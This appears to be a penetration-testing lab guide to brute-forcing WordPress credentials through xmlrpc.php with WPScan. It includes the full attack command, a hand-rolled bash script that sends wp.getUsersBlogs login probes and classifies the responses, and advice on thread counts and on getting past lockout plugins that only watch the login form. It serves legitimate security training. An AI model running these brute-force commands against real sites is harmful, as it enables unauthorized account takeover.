Use these techniques only against systems you own or have explicit written authorization to test. Unauthorized access is illegal and unethical.

What is WPScan?

WPScan is an open-source WordPress security scanner. Beyond vulnerability detection, it can brute-force credentials through several attack modes, one of which is xmlrpc: authentication attempts are sent to WordPress's xmlrpc.php endpoint (via the wp.getUsersBlogs method) rather than to the wp-login.php form. That makes it a useful lab exercise: lockout and CAPTCHA plugins that only hook the login form never see these attempts, and the same technique is used against poorly secured WordPress sites in the wild. WPScan also offers an xmlrpc-multicall mode that packs many attempts into a single system.multicall request; this page uses the plain xmlrpc mode.

Prerequisites

WPScan installed

Install with gem install wpscan (a recent Ruby is required) or pull the official Docker image, wpscanteam/wpscan. Confirm the install with wpscan --version.

Lab WordPress target

A WordPress instance running at http://TARGET/lab/ that you control or have authorization to test.

XML-RPC enabled

The target must serve xmlrpc.php. Verify with curl http://TARGET/lab/xmlrpc.php (step 1 below shows what to expect). Note that a site which has turned XML-RPC off through the xmlrpc_enabled filter still answers that GET normally and only refuses authenticated method calls, so a reachable file does not by itself prove the attack will work.

Wordlists downloaded

Both users.txt and passwords.txt from this repository must be present on your machine.

Running the attack

1. Verify XML-RPC is accessible

Before running WPScan, confirm that xmlrpc.php is reachable:
curl -s -i http://TARGET/lab/xmlrpc.php
WordPress answers a plain GET with HTTP 200, a Content-Type of text/plain and a one-line body:
XML-RPC server accepts POST requests only.
The XML methodResponse envelope is only returned for POST requests that carry a methodCall body, so do not expect it here. If you get a 404, the path is wrong or the file has been removed; a 403 usually means the web server or a security plugin is blocking xmlrpc.php. A site that has disabled XML-RPC through the xmlrpc_enabled filter still returns the text above and only refuses authenticated calls, which WPScan reports once the attack starts (see Troubleshooting).
2. Run WPScan with XML-RPC brute-force

Execute the following command, replacing TARGET with your lab host:
wpscan --url http://TARGET/lab/ \
  --passwords passwords.txt \
  --usernames users.txt \
  --password-attack xmlrpc \
  --max-threads 50
WPScan will iterate through every combination of username and password using the XML-RPC interface.
3. Review the output

Watch the terminal for credential discoveries. WPScan prints a summary at the end of the run with any valid credentials found.

Flag reference

--url
The base URL of the WordPress installation. WPScan appends xmlrpc.php itself when the xmlrpc attack mode is selected. Include the full path if WordPress lives in a subdirectory, as in http://TARGET/lab/.

--passwords
Path to the password wordlist. WPScan reads it line by line and tries each entry. Use passwords.txt from this repository, which holds approximately 1,500 common passwords and pattern variations.

--usernames
Path to the username wordlist, or a comma-separated list of usernames. Use users.txt from this repository, which holds 1,200 common usernames seen on servers, in web applications and in corporate environments.

--password-attack xmlrpc
Selects the XML-RPC attack mode. Instead of posting to wp-login.php, WPScan sends POST requests to xmlrpc.php calling the wp.getUsersBlogs method with each candidate username and password. This sidesteps protections that only watch the login form; whether it is faster depends on the target, and it is the related xmlrpc-multicall mode, which batches attempts into one system.multicall request, that actually cuts the number of requests.

--max-threads
Number of concurrent requests WPScan makes (the default is 5). 50 is a reasonable balance between speed and load on a dedicated lab VM; reduce it if the server becomes unresponsive.
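To see what the xmlrpc attack mode actually sends per attempt, here is a hand-rolled version of the wp.getUsersBlogs probe described above, plus a classifier for the three answers WordPress gives (bad login, XML-RPC disabled, success). This is an added example and not WPScan's code; the target URL http://TARGET/lab/xmlrpc.php follows this page's lab layout, and the sample responses embedded in the script are constructed from the shape WordPress returns rather than captured from a live site. It also covers the disabled-via-filter case that the plain GET in step 1 cannot detect.

```shell
#!/usr/bin/env bash
# Added example (not WPScan's code): send the same wp.getUsersBlogs probe that
# WPScan's xmlrpc attack mode uses, and classify WordPress's reply.
# Assumptions: the lab lives at http://TARGET/lab/ as in this page; the sample
# responses below are constructed from the shape WordPress returns, not captured.
set -u

# Escape the XML special characters so a password such as 'p<a&ss' stays intact
# inside the <string> element instead of breaking the document.
xml_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# Build the XML-RPC request body: wp.getUsersBlogs(username, password).
build_getusersblogs() {
  local user pass
  user=$(xml_escape "$1")
  pass=$(xml_escape "$2")
  printf '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>' \
    "$user" "$pass"
}

# Classify a methodResponse body. WordPress answers a bad login with a fault
# (faultCode 403, "Incorrect username or password."), a site with XML-RPC
# disabled with faultCode 405, and a good login with an array of blog structs
# that carry a blogid member. Whitespace is stripped first so the sed pattern
# works whether the XML is pretty-printed or on one line.
classify_response() {
  local flat code
  flat=$(printf '%s' "$1" | tr -d '\n\r\t ')
  code=$(printf '%s' "$flat" | sed -n 's/.*faultCode<\/name><value><int>\([0-9]*\)<\/int>.*/\1/p')
  if [ -n "$code" ]; then
    case "$code" in
      403) echo valid=no ;;
      405) echo xmlrpc-disabled ;;
      *)   echo "fault:$code" ;;
    esac
  elif printf '%s' "$flat" | grep -q '<name>blogid</name>'; then
    echo valid=yes
  else
    echo unknown
  fi
}

# Real probe against the lab (needs the network). Usage: probe admin 'secret' [URL]
probe() {
  local url="${3:-http://TARGET/lab/xmlrpc.php}"   # assumed lab path
  classify_response "$(curl -s -X POST -H 'Content-Type: text/xml' \
                        --data-binary "$(build_getusersblogs "$1" "$2")" "$url")"
}

# Constructed sample bodies, trimmed to the members the classifier inspects.
SAMPLE_BAD_LOGIN='<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault><value><struct>
    <member><name>faultCode</name><value><int>403</int></value></member>
    <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
  </struct></value></fault>
</methodResponse>'
SAMPLE_DISABLED='<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault><value><struct>
    <member><name>faultCode</name><value><int>405</int></value></member>
    <member><name>faultString</name><value><string>XML-RPC services are disabled on this site.</string></value></member>
  </struct></value></fault>
</methodResponse>'
SAMPLE_GOOD_LOGIN='<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params><param><value><array><data><value><struct>
    <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
    <member><name>url</name><value><string>http://TARGET/lab/</string></value></member>
    <member><name>blogid</name><value><string>1</string></value></member>
    <member><name>blogName</name><value><string>lab</string></value></member>
  </struct></value></data></array></value></param></params>
</methodResponse>'
```

Source the script and run probe admin 'password123' to send one real request; classify_response also works on saved bodies offline. The classifier keys on faultCode rather than faultString because the string is localized on non-English installations, and a 405 after WPScan reports "disabled" tells you the xmlrpc_enabled filter, not the web server, is the blocker.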

Interpreting the output

WPScan produces real-time output as it tests credentials. Key lines to watch for:
  • [+] Performing password attack on Xmlrpc against N user/s — the attack phase has started with the users it was given or enumerated.
  • Trying username / password ... — progress indicator showing the current attempt.
  • [SUCCESS] - username / password — printed the moment a combination is accepted.
  • [!] Valid Combinations Found: — the summary block at the end; each valid pair is listed below it.
  • [i] No Valid Passwords Found. — the run completed without finding credentials.
At the end of a successful run, you will see output similar to:
[!] Valid Combinations Found:
 | Username: admin, Password: password123
Save the run for later review: either pipe it through tee (append | tee wpscan-results.txt to the command) or use WPScan's own -o wpscan-results.txt, adding -f json when you want machine-readable output.

Adjusting thread count

The --max-threads value directly affects how hard WPScan hits the target server (the default is 5).

Threads   Use case
5–10      Slow and stealthy; minimizes server load
20–30     Balanced for most lab environments
50        Fast; suitable for local or dedicated lab VMs
100+      Risk of overwhelming the server or triggering timeouts

In shared lab environments, use --max-threads 10 or lower so you do not affect other participants; --throttle MILLISECONDS adds a pause between requests if you need to go slower still.

Troubleshooting

XML-RPC reported as disabled

WPScan will report that the XML-RPC interface is disabled (WordPress answers authenticated calls with faultCode 405, "XML-RPC services are disabled on this site."). To enable it in your lab instance, add the following filter to your theme's functions.php or to a must-use plugin:
add_filter('xmlrpc_enabled', '__return_true');
This only undoes a filter-based block inside WordPress. If a plugin registers its own xmlrpc_enabled filter at a later priority, or the host blocks xmlrpc.php in the web server configuration, remove that block instead. After saving, verify with curl http://TARGET/lab/xmlrpc.php: a response of "XML-RPC server accepts POST requests only." confirms the endpoint is still served, and a wp.getUsersBlogs call with known-bad credentials should now return faultCode 403 rather than 405.

Timeouts or HTTP 429

If requests are timing out or returning HTTP 429, reduce --max-threads or add --throttle MILLISECONDS. --request-timeout sets the per-request timeout in seconds and defaults to 60, so lowering it (for example to 10) makes WPScan give up sooner on a stalled server rather than wait longer; raise it only for a server that is slow but does respond.

Connection refused or no response

Verify that the target URL is correct and the WordPress lab is running. Check that you are on the correct network (VPN, local network, etc.) and that the port is reachable with curl.

Missing API token warning

WPScan may display a warning about a missing API token for vulnerability data. This warning does not affect the brute-force functionality. You can obtain a free token at wpscan.com and pass it with --api-token if needed.

No valid credentials found

Confirm that the target credentials actually appear in the wordlists (grep -x for the exact value in users.txt and passwords.txt). Also verify that --url points to the correct WordPress installation path, including any subdirectory such as /lab/; the trailing slash itself is optional.
